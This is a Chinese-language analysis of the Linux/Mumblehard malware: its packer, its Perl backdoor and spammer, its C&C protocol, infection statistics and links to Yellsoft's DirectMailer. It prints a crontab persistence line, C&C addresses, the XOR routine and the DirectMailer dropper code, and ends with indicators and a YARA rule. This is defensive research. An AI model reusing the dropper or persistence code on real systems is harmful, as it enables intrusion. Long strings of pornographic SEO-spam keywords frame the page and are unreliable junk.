精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

深度分析惡意軟件Mumblehard

安全
我們發現Linux/ Mumblehard的原因來自于某天某網管聯系我們,他的服務器因為不斷發送垃圾郵件被列入了黑名單。我們dump了服務器上其中一個奇怪進程的內存,這玩意連接到了一個不同的SMTP服務器,并發送垃圾郵件。

0x00 簡介

我們發現Linux/ Mumblehard的原因來自于某天某網管聯系我們,他的服務器因為不斷發送垃圾郵件被列入了黑名單。我們dump了服務器上其中一個奇怪進程的內存,這玩意連接到了一個不同的SMTP服務器,并發送垃圾郵件。dump下來的內存顯示這玩意是一個,唔,perl解釋器,隨之我們在/tmp目錄發現了一個相關的可執行文件,并且立即開始著手分析,為了方便我們給這玩意起名Mumblehard。

說實話我們對這玩意產生了極大的興趣,因為在惡意軟件中,perl腳本被封裝在ELF可執行文件中是很少見的,至少這玩意比起其他來說要更加復雜一些。另外一點是我們發現這款惡意軟件與一家叫Yellsoft的軟件公司存在很大的聯系,而第一個被發現的樣本在09年提交到VirusTotal。

深度分析惡意軟件Mumblehard

Figure 1. Wayback Machine上顯示的Yellsoft主頁

我們對所發現已經確認遭到感染的系統進行了調查,確認了兩種可能的傳播方式,最常見的利用Joomla和Wordpress的exp進行傳播,另外一種是通過分布式的后門,Yellsoft在他們主頁上銷售一種叫DirectMailer的軟件,240美刀,其中裝有特殊的后門。

這篇paper描述了惡意軟件中的組件的分析,以及我們對受害者的統計調查,還有那家神秘的Yellsoft。

0x01 惡意軟件分析

我們分析了兩種不同的惡意軟件組件,第一個是一個通用的后門,向C&C服務器請求一個命令,該命令包含一個網址,然后通過這個網址下載惡意文件并且執行,第二個是一種多功能的垃圾郵件發送器的程序。這兩個組件都使用perl進行編寫,然后使用一個匯編寫的特殊加殼器進行混淆,最終隱藏到一個ELF格式的二進制文件中。

下面的圖顯示了惡意軟件和C&C服務器之間的關系。

惡意軟件分析

Figure 2. Linux/Mumblehard的交互

下面我們會先解析加殼器的細節,然后在描述后門和郵件發送器的功能。

1.1 ELF二進制中的perl殼

最初引起我們興趣的是惡意軟件的加殼器,簡單看看反匯編代碼,我們可以很明顯的看出,加殼器是直接使用匯編進行編寫,整個加殼大約使用了200個匯編指令。這個觀察來源于兩個點,一個是他們直接使用int 80指令進行系統中斷,另一個是它們并不適用常見的方式進行堆棧管理。

通過其系統調用的方式,可執行文件可以避免任何的外部依賴,同時,加殼器被確認適用于linux和bsd系統。因為系統進行了系統調用13,并傳入了參數0,該系統調用對應到linux的時間,和BSD的標準輸入。在BSD上該調用失敗后會返回一個負數到eax上,而linux上會返回一個正數表示從1970年到今天過了幾秒。

惡意軟件Mumblehard分析

Figure 3. system call 13

之后會fork()一個perl解釋器("/usr/bin/perl", ...)然后通過標準輸入將perl腳本發送給進程。并且使用系統調用pipe和dup2來處理文件描述符。這一來父進程就可以將解密后的perl腳本寫入解釋器。#p#

1.2 perl后門

后門實際上只有一個簡單的任務,就是從C&C服務器上請求一條命令,并且返回其是否成功。不過后門并不會使用daemonize來進行進程守護,他直接使用crontab來每15分鐘執行一次。

 

  1. $ crontab -l  
  2. */15 * * * * /var/tmp/qCVwOWA >/dev/null 2>&1 

 

并且還通過分配$0來將自己偽裝成httpd。

 

  1. $0 = "httpd"

 

每次運行,后門都會向列表中的后門發送一條查詢請求命令,就算某臺已經返回過有效的命令。

綜合來說該后門只支持一條命令:0x10下載并執行。我們分析了手頭的樣本整理出了下面這樣的list,事實上,只有ip:194.54.81.163返回過命令,其他應該都是掛掉了,比如,域名behance.net 在2005年被adobe收購。

• 184.106.208.157 • 194.54.81.163 • advseedpromoan.com • 50.28.24.79 • 67.221.183.105 • seoratingonlyup.net • advertise.com • 195.242.70.4 • pratioupstudios.org • behance.net

1.2.1 C&C通信

Mumblehard使用http的get對每臺C&C服務器發送請求,將返回的命令隱藏在http響應頭的Set-Cookie中,來逃避一些數據包的檢測。

一個請求的例子

123456789HTTP/1.0 200 OK

 

  1. HTTP/1.0 200 OK  
  2. Date: Sat, 14 Feb 2015 23:01:57 GMT  
  3. Server: Apache/1.3.41 (Unix)  
  4. Set-Cookie: PHPSESSID=260518103c38332d35373729393e39253e3c3b207f66736577722861646b6c 
  5. 697e217c647066603a7f66706363606f61; path=/  
  6. Content-Length: 18  
  7. Connection: close  
  8. Content-Type: text/html  
  9. under construction 

 

PHPSESSID cookie值進行了hex進行編碼,并且通過自定義的算法進行加密,該加密算法與加殼器中用來加密perl腳本的算法是相同的.

惡意軟件Mumblehard分析

Figure 4. 用匯編寫的加密算法

perl版加密

 

  1. sub xorl {  
  2.  my ($line, $code, $xor, $lim) = (shift, "", 1, 16);  
  3.  foreach my $chr (split (//, $line)) {  
  4.   if ($xor == $lim) {  
  5.     $lim = 0 if $lim == 256;  
  6.     $lim += 16;  
  7.     $xor = 1;  
  8.   }  
  9.   $code .pack ("C", unpack ("C", $chr) ^ $xor);  
  10.   $xor ++;  
  11.  }  
  12.  return $code;  

 

一旦解密,下面的信息回從cookie中提取出來。 

enter image description here 
enter image description here 

這里有一個解密后的信息的例子。 

enter image description here 

Mumblehard后門的user-agent

Mozilla/5.0 (Windows NT 6.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1

該user-agent被驗證與windows7上Firefox 7.0.1的user-agent相同。不過在下載完成后,惡意軟件會向服務器發送請求報告是否下載了文件,該信息隱藏在user-agent中,格式大概是下面這個樣子

Mozilla/5.0 (Windows NT 6.1; rv:7.0.1) Gecko/.. Firefox/7.0.1

一個實際的例子

Mozilla/5.0 (Windows NT 6.1; rv:7.0.1) Gecko/24.200.56013 Firefox/7.0.1

#p#

1.3 perl惡意郵件發送器

該惡意軟件發送器也是perl寫的,并且加殼后嵌入elf可執行文件,目的在于向C&C請求任務,并且發送惡意郵件,Mumblehard支持大部分一個惡意郵件發送器會有的功能,模板,報表,SMTP執行等,我們會將接下來的內容限制在其中的一些獨特的功能和網絡協議等。

perl本身是兼容多個操作系統的,所以我們認為該惡意軟件是針對多個類型的操作系統為目標,不過其中的EWOULDBLOCK和EINPROGRESS常量是不可移植的,盡管如此,該惡意軟件的常量還是可以兼容Linux, FreeBSD and Windows。目前我們抓到的樣本是無法在windows上運行的,不過也可能表示針對windows平臺他們開發了不同類型的加殼器。

其中的perl

 

  1. if ( $^O eq "linux" ) { $ewblock = 11; $eiprogr = 115; }  
  2. if ( $^O eq "freebsd" ) { $ewblock = 35; $eiprogr = 36; }  
  3. if ( $^O eq "MSWin32" ) { $ewblock = 10035; $eiprogr = 10036; } 

 

這玩意有兩種方式發送惡意郵件,一種是請求C&C服務器上的一個任務,第二種是開啟一個代理。

1.3.1 C&C通信

C&C服務器運行在端口25上,惡意郵件發送器可以通過post請求發送二進制數據,內容如下表 

enter image description here 

不過這些數據似乎只在一種情況下會被使用,比如統計有多少服務器在發郵件啥的。它存在4個32位的整數頭。

任務的表示符

成功的郵件數目

網絡問題失敗的郵件數目

被SMTP服務器拒絕的郵件數目

惡意主機還可以自定義發送報告的詳細程度,其中有三個級別,最低的一級只有數字,中級包括電子郵件地址,最高一級包括成功或者失敗的原因。最初的請求,服務器會返回一個200的響應,包含設置,電子郵件列表,和垃圾郵件模版。 

enter image description here 

 

enter image description here

 

enter image description here 

1.3.2 代理功能的特點

我們分析的大多數的樣本中都包含一個通用的代理組件,工作原理很簡單,監聽tcp端口的連接,并且發送通知,只有c&c服務器的連接允許連接到該端口,但是內部有一個list,可以自定義添加允許的連接。不過其實只有兩條命令會被代理組件識別。

添加ip地址到允許列表

創建一個新的tcp隧道

下面是用作參考的協議內容 

enter image description here

 在創建連接時候實際上使用的是通過SOCKS4協議進行實現,這個功能允許黑客傳輸任意的流量到服務器,不過蛋疼的是我們并沒有見該功能使用過,所以并無法斷定是用于什么。#p#

1.3.3 惡意郵件內容

我們跟蹤了大量的惡意郵件,發現主要是用于推廣一些藥物產品,并且還有產品官方的鏈接,這里是其中一個例子。 

enter image description here 

該惡意郵件的鏈接販賣解決性功能障礙的藥物的網站。 

enter image description here 

具體網站為加拿大的spamtrackers.eu ,不過其消息頭貌似是使用隨機的詞。

Million-Explosively-Arrogance: B77FE821EAB1
Copes-Horribly: 881976c526e6
Formants-Carmichael-Cutlet: consistency
Interoffice-Gastronome-Unmodified: d41f7ebe89a

目前還不知道將其添加到反垃圾郵件簽名是否有效果,不過我們認為是有的。

0x02 被感染主機的統計

其中惡意服務器支持的C&C域名其中一部分已經失效,所以我們購買了其中的域名來監控受到感染的服務器,我們使用了惡意軟件中用到的特殊的user-agent來進行監控。

下面是我們收集的2014年9月19日到2015年4月22日的數據,大概存在8,867個ip進行連接,其中大部分是用于網站托管的服務器。 

enter image description here 

(此處省略部分關于統計的細節)

0x03 WHO IS YELLSOFT?

樣本中的C&C服務器的ip范圍位于 194.54.81.162 到194.54.81.164

194.54.81.162:53 Hardcoded DNS server in Mumblehard’s spammer
194.54.81.163:54321 Report from Mumblehard’s proxy is open
194.54.81.163:25 C&C server for Mumblehard’s spammer
194.54.81.164:25 C&C server for Mumblehard’s spammer

如果你檢查下面的兩個ip,你會發現他們都是194.54.81.165和194.54.81.166的名稱服務器,其中yellsoft.net web服務器托管 在194.54.81.166,其中162到166的ip的ns和soa都是相同的,這可以表明,這5個ip都是托管在同一臺服務器上。

 

  1. $ dig +short -x 194.54.81 SOA | uniq -c   
  2. 1 ns1.rx-name.net. hostmaster.81.54.194.in-addr.arpa. 2015031209 28800 7200 604800 86400  
  3. $ for i in 2 3 4 5 6; do dig +short -x 194.54.81 SOA @194.54.81.16$i; done | uniq -c   
  4. 5 ns1.yellsoft.net. support.yellsoft.net. 2013051501 600 300 604800 600 

 

那么Yellsoft是干嘛的,他們銷售一種perl編寫的批量郵件發送工具,叫DirectMailer。運行在UNIX系統上。 

enter image description here #p#

3.1 DirectMailer分析

其主頁上告訴訪客,他們不提供直接下載,下載地址被托管在narod.ru上,我們可以從上面得到副本。在2014年我們下載了一個叫 directmailer-retail.zip 的壓縮包,之后ESET講其識別為惡意軟件后,該軟件就不再被放置于softexp.narod.ru上。

zip包含一個dm.pl 文件,不過其為elf可執行文件,打包了各種perl腳本。在主程序啟動之前,程序會調用一個bdrp的函數,該函數有一個uuencoded編碼的blob,解碼運行后會生成另一個ELF可執行文件,包含一個加殼后的perl腳本,它會被寫入文件系統和cron 15分鐘運行一次。很熟悉是不?

bdrp函數

  1. sub bdrp {  
  2.   my $bdrp = <<'BDRPDATA';  
  3.   M?T5,1@$!`0D```````````(``P`!````3(`$""P``````````````#0`(``!  
  4.   M``````````"`!`@`@`0("1H``!X>```'`````!```(DE"9H$"+@-````,=M3  
  5.   ...  
  6.   M)S5I=6=\9&(Z-WQT>'-T?#,@/'YR<%-$`@=,1$A#1$P1"U$-7$I$1$!=#Q5+  
  7.   %%T491S$`  
  8.   BDRPDATA  
  9.   $bdrp = unpack( "u*", $bdrp );  
  10.     foreach my $bdrpp ( "/var/tmp", "/tmp" ) {  
  11.     # Delete all executable files in temporary directory  
  12.     # (delete existing Mumblehard installation)  
  13.     for (<$bdrpp/*>) { unlink $_ if ( -f $_ && ( -x $_ || -X $_ ) ); }  
  14.     # Create random file name  
  15.     my $bdrpn = [ "a" .. "z", "A" .. "Z" ];  
  16.     $bdrpn = join( "",  
  17.     @$bdrpn[ map { rand @$bdrpn } ( 1 .. ( 6 + int rand 5 ) ) ] );  
  18.     my $bdrpb = "$bdrpp/$bdrpn";  
  19.     my $bdrpc = $bdrpb . int rand 9;  
  20.     # crontab job to add (runs every 15 minutes)  
  21.     my $bdrpt = "*/15 * * * * $bdrpb >/dev/null 2>&1\n";  
  22.     if ( open( B, ">", $bdrpb ) ) {  
  23.     # Drop file and install job with crontab  
  24.     [...]  
  25.     }  
  26.   }  

0x04 結論

惡意軟件正在變的越來越復雜,另一個令人擔憂的是Mumblehard的運營這么多年一直沒中斷過。

附錄A

UDP packets to

• 194.54.81.162 port 53

TCP connections to

• 194.54.81.163 port 80 (backdoor)
• 194.54.81.163 port 54321 (proxy)
• 194.54.81.163 port 25 (spammer)
• 194.54.81.164 port 25 (spammer)

HTTP requests with the following User-Agent pattern

• Mozilla/5.0 (Windows NT 6.1; rv:7.0.1) Gecko/<1 or more digits>.
<1 ormore digits>.<1 or more digits> Firefox/7.0.1

yara rule

  1. rule mumblehard_packer  
  2. {  
  3. meta:  
  4.  description = "Mumblehard i386 assembly code responsible for decrypting Perl  
  5. code"  
  6.  author = "Marc-Etienne M.Léveillé" 
  7.  date = "2015-04-07" 
  8.  reference = "http://www.welivesecurity.com" 
  9.  version = "1" 
  10. strings:  
  11.  $decrypt = { 31 db [1-10] ba ?? 00 00 00 [0-6] (56 5f | 89 F7)  
  12.  39 d3 75 13 81 fa ?? 00 00 00 75 02 31 d2 81 c2 ?? 00 00  
  13.  00 31 db 43 ac 30 d8 aa 43 e2 e2 }  
  14. condition:  
  15.  $decrypt  

 

責任編輯:藍雨淚 來源: 烏云知識庫
相關推薦

2015-05-04 10:24:01

2016-09-19 15:40:25

2015-05-05 11:27:01

2015-08-24 11:58:14

2013-08-12 15:44:44

Pyew惡意軟件分析工具惡意軟件分析

2023-12-12 09:00:00

2019-05-09 10:51:29

惡意軟件加密通信網絡攻擊

2016-01-11 10:44:38

惡意軟件惡意軟件分析

2017-11-06 12:10:35

SSnatchLoad惡意軟件

2011-03-02 09:44:45

2023-08-07 07:44:44

2009-02-04 10:30:47

2022-09-27 14:46:03

網絡安全計算機惡意軟件

2017-11-03 12:25:00

2011-06-07 14:58:03

2022-06-14 11:57:40

惡意軟件勒索軟件

2019-01-09 08:16:31

2021-01-27 09:52:55

惡意軟件技術網絡安全

2013-05-23 09:18:01

2012-10-11 10:11:09

點贊
收藏

51CTO技術棧公眾號

99re视频在线观看| 久久精品国产成人| 少妇高清精品毛片在线视频| 美女欧美视频在线观看免费 | 欧美极品少妇xxxxⅹ免费视频| 又色又爽又黄18网站| 午夜影视一区二区三区| 日本一二三不卡| 亚洲最大成人免费视频| 日韩免费视频一区二区视频在线观看| 国产一区二区三区四区五区传媒 | 国偷自产av一区二区三区麻豆| 136福利第一导航国产在线| 国产日韩欧美麻豆| 国产高清精品一区二区三区| 亚洲婷婷久久综合| 欧美福利电影在线观看| 国产亚洲激情视频在线| 欧美图片自拍偷拍| 精品视频一区二区三区四区五区| 亚洲精品国产高清久久伦理二区| 久草精品电影| a级片免费视频| 亚洲三级毛片| 久久夜精品va视频免费观看| chinese麻豆新拍video| 成人激情久久| 欧洲精品一区二区三区在线观看| 国产一线二线三线女| 男人的天堂在线视频免费观看 | 国产精品一区二区免费不卡| 国产v综合ⅴ日韩v欧美大片| 福利一区二区三区四区| 99国产精品免费视频观看| 日韩精品福利在线| 韩国三级在线看| 国产专区精品| 4438x成人网最大色成网站| 国产日韩成人内射视频 | 亚洲国产sm捆绑调教视频| 亚洲精品视频一二三| 全色精品综合影院| 不卡大黄网站免费看| 亚洲影院高清在线| 91亚洲国产成人精品一区| 美女久久网站| 5566成人精品视频免费| 日韩三级小视频| 欧美人成在线| 久久91亚洲精品中文字幕| 国产亚洲精品久久久久久豆腐| 国产一区国产二区国产三区| 日韩av网站在线| 国产原创剧情av| 粉嫩一区二区三区四区公司1| 日韩一区二区在线免费观看| 99999精品| 欧美一级片网址| 欧美一二三在线| 亚洲av无码久久精品色欲| av在线成人| 日韩亚洲欧美综合| 亚洲成人激情小说| 91成人精品在线| 亚洲成人精品视频| 亚洲图片综合网| 天天久久夜夜| 亚洲午夜性刺激影院| 国产又粗又猛又爽视频| 禁果av一区二区三区| 一区二区三区久久精品| 毛片视频免费播放| 国产精品麻豆久久| 欧美激情视频一区二区三区不卡| 精品一区在线视频| 中文亚洲字幕| 国产成人综合精品在线| 中文字幕网址在线| 精品一区二区三区在线播放| 91免费版黄色| 色一情一乱一乱一区91av| 2020国产精品久久精品美国| 午夜免费电影一区在线观看| 黄色一级大片在线免费看产| 亚洲国产精品麻豆| 国产日产欧美视频| 国产在视频一区二区三区吞精| 在线成人av影院| 91精品人妻一区二区三区蜜桃2 | 亚洲欧洲自拍| 欧美日韩精品一区二区| gogo亚洲国模私拍人体| 奇米777国产一区国产二区| 亚洲午夜激情免费视频| 成人涩涩小片视频日本| 日韩一级大片| 国产精品精品国产| 亚洲国产日韩在线观看| 91视频观看视频| 自拍偷拍亚洲色图欧美| 狼人综合视频| 7777精品伊人久久久大香线蕉最新版| 天天躁日日躁狠狠躁av| 日本久久黄色| 91国产在线精品| 国产老妇伦国产熟女老妇视频| 91蜜桃网址入口| 91精品国产吴梦梦| 午夜无码国产理论在线| 精品久久人人做人人爽| 丁香六月激情综合| 国产视频欧美| 99久久精品免费看国产一区二区三区| 九色网友自拍视频手机在线| 一区二区三区精品在线观看| 久久久久狠狠高潮亚洲精品| 日本一区二区三区电影免费观看| 日韩精品免费综合视频在线播放| 网站永久看片免费| 老司机午夜免费精品视频| 国产日韩在线亚洲字幕中文| 午夜视频福利在线| 中文字幕一区在线观看视频| 5月婷婷6月丁香| 精品国产一区二区三区2021| 综合国产在线视频| 天天操天天干视频| 久久精品久久精品| 精品综合在线| 亚洲卡一卡二| 欧美系列一区二区| 777一区二区| 精品国产欧美日韩| 91精品国产色综合久久不卡98| 一卡二卡在线视频| 久久久精品欧美丰满| 国产美女作爱全过程免费视频| 亚洲天堂1区| 精品一级毛片| 一区二区亚洲精品国产| 一区二区成人免费视频| 视频一区中文字幕| 国产欧美一区二区视频 | 911亚洲精品| 日韩最新在线视频| 国产精品成人久久久| 91亚洲精品久久久蜜桃网站| 欧美日韩午夜爽爽| 电影中文字幕一区二区| 国产丝袜一区二区三区免费视频| 久久精品性爱视频| 国产精品一区二区三区网站| 国产精品美女在线播放| 久久爱.com| 在线观看欧美成人| 日本a级c片免费看三区| 99久久夜色精品国产网站| 欧美 国产 精品| 日本一区二区乱| 久热精品在线视频| 国产又粗又大又爽视频| 国产精品污网站| 动漫av免费观看| 一区二区三区视频免费观看| 8090成年在线看片午夜| 香蕉国产在线视频| 偷拍日韩校园综合在线| 国产伦理在线观看| 午夜视频精品| 国产成人一区二区三区免费看| www.欧美日本韩国| 日韩一区二区三免费高清| 亚洲色图日韩精品| 久久精品一本| 日本成人黄色免费看| 午夜裸体女人视频网站在线观看| 日韩精品中文字幕在线| 国产午夜精品久久久久| 91论坛在线播放| 国产三级三级三级看三级| 精品视频亚洲| 国产精品99久久久久久久久| 日本亚洲精品| 日韩一级免费观看| 久视频在线观看| 久久久久青草大香线综合精品| 无码播放一区二区三区| 成人嘿咻视频免费看| 国产日韩欧美一二三区| 久久综合网导航| 精品福利av导航| 久久久国产精品成人免费| 久久久一区二区三区捆绑**| 国产l精品国产亚洲区久久| 女人丝袜激情亚洲| 国产日韩精品视频| 美女日批视频在线观看| 国产视频在线观看一区二区| 欧美性受xxx黑人xyx性爽| 国产精品久久久久永久免费观看| 在线观看av免费观看| 欧美三级视频| 蜜桃传媒一区二区| 亚洲三级电影| 欧美激情视频一区二区| 国产精品免费观看| 91麻豆精品91久久久久久清纯| 精品视频久久久久| 久久精品视频一区二区| 婷婷中文字幕在线观看| 免费在线观看成人av| 在线国产伦理一区| 少妇久久久久| 91情侣偷在线精品国产| 污污在线观看| 在线丨暗呦小u女国产精品| 国产高清免费观看| 日韩欧美在线视频免费观看| 北条麻妃在线观看视频| 高清久久久久久| 不用播放器的免费av| 国产欧美一级| 欧美xxxx吸乳| 欧美一级淫片| 91亚洲精品在线观看| 成人va天堂| 国模视频一区二区三区| 黄色网页在线免费观看| 亚洲色图综合久久| 久久99久久99精品| 性一交一乱一乱一视频| 一个色妞综合视频在线观看| 免费一级特黄3大片视频| 99久久婷婷国产综合精品电影 | 亚洲老妇xxxxxx| 永久免费成人代码| 波多野结衣在线一区| 黄色一级一级片| 亚洲二区精品| 亚洲一二区在线| 网友自拍一区| 国产日本一区二区三区| 免费一级欧美片在线观看网站| 国产精品高潮视频| 综合日韩av| 国自产精品手机在线观看视频| 国产精品久久麻豆| 日韩精品一区二区视频| 亚洲精品国产精品国| 91精品国产综合久久精品 | 欧美jizz19性欧美| av一区二区三区四区电影| 免费一区二区三区四区| 国产97在线|日韩| 97se综合| 午夜精品一区二区三区视频免费看 | 欧美wwwxxxx| 懂色av中文在线| 日韩电视剧在线观看免费网站| 国产成人精品无码高潮| 欧美一区二区三区四区视频| 国产精品久久久久久69| 欧美日韩国产高清一区二区三区| 最近国语视频在线观看免费播放| 色综合久久久久综合99| 日本午夜视频在线观看| 天天色图综合网| 日本三级小视频| 欧美午夜电影在线| 狠狠人妻久久久久久综合| 亚洲国产成人精品视频| 日本三级网站在线观看| 亚洲一区二区三区视频在线| 久久婷婷一区二区| 亚洲国产精品久久久久秋霞影院 | av综合网址| 97伦理在线四区| 精品国产乱码久久久久久樱花| 国产欧美久久久久久| 欧美性www| 91精品综合视频| 亚洲成人影音| 成人免费视频观看视频| 久久99精品国产自在现线| 久久av二区| 欧美日韩水蜜桃| 亚洲精品永久www嫩草| 91精品啪在线观看国产81旧版| 亚洲国产一二三精品无码| 国产精品激情| 国产免费毛卡片| 青青草精品视频| 一级做a爱视频| 成人国产免费视频| 91视频在线网站| 中文字幕日本乱码精品影院| 五月婷婷六月香| 一区二区三区四区五区视频在线观看 | 91日韩欧美| 看一级黄色录像| 99这里有精品| 免费av网址在线| 极品少妇一区二区三区精品视频| 日韩一级免费片| 国产一区二区毛片| 亚洲一级Av无码毛片久久精品| 91蜜桃网址入口| 国产sm调教视频| 一区二区日韩av| 天天干天天干天天干天天| 欧美剧情片在线观看| 欧美熟妇另类久久久久久不卡 | 久久久欧美精品| aa级大片免费在线观看| 国产精品久久久久久久一区探花| 日韩欧美另类中文字幕| 久久精品日产第一区二区三区乱码| 欧美日一区二区| 免费无码毛片一区二三区| 免费在线成人网| 你懂得在线视频| 欧美激情一区不卡| 一级aaa毛片| 欧美浪妇xxxx高跟鞋交| 日韩成人黄色| 久久成人精品一区二区三区| 精品国产免费人成网站| 成人看片视频| 精品免费视频| 特大黑人娇小亚洲女mp4| 日韩精品一级中文字幕精品视频免费观看 | 五月天开心婷婷| 92国产精品观看| 顶臀精品视频www| 色狠狠色狠狠综合| 日日夜夜精品免费| 欧美成人免费全部| 电影一区二区| 久久综合九色综合久99| 亚洲精品婷婷| 伊人影院在线观看视频| 亚洲欧洲美洲综合色网| 国产小视频在线免费观看| 日韩亚洲电影在线| 香蕉视频在线免费看| 国产91精品在线播放| jizz久久精品永久免费| 视频一区二区视频| 日本免费新一区视频| 国产男男chinese网站| 亚洲成人免费在线| 国模私拍视频在线| 欧美成人亚洲成人日韩成人| 国精产品一区二区三区有限公司| 国产伦精品一区二区三区四区视频 | 777奇米四色成人影色区| 1区2区3区在线观看| 国产精品美女久久| 老牛精品亚洲成av人片| 精品国产一区二区三区无码| 国产精品一区二区久激情瑜伽| 青花影视在线观看免费高清| 欧美军同video69gay| 免费a在线看| 91久久久久久久一区二区| 日韩系列欧美系列| 午夜视频在线网站| 18涩涩午夜精品.www| 国产免费高清视频| 亚洲日本aⅴ片在线观看香蕉| av成人 com a| 狠狠干一区二区| 亚洲永久网站| 波多野结衣三级视频| 亚洲电影一级黄| 欧美视频一二区| 国产ts人妖一区二区三区| 好吊妞视频这里有精品| a级免费在线观看| 91影院在线免费观看| 亚洲影院在线播放| 中文字幕日韩电影| 日韩不卡视频在线观看| 亚洲一区三区| 国产成人一级电影| 日本在线视频中文字幕| 日韩精品在线免费观看| 91精品影视| 在线免费观看成人网| 男男成人高潮片免费网站| 综合五月激情网| 亚洲二区中文字幕| 欧美电影h版| 一本一本a久久| 国产成人自拍高清视频在线免费播放| 国产精品久久久视频| 欧美制服丝袜第一页| h片在线免费观看| 九色91视频| 免费视频久久|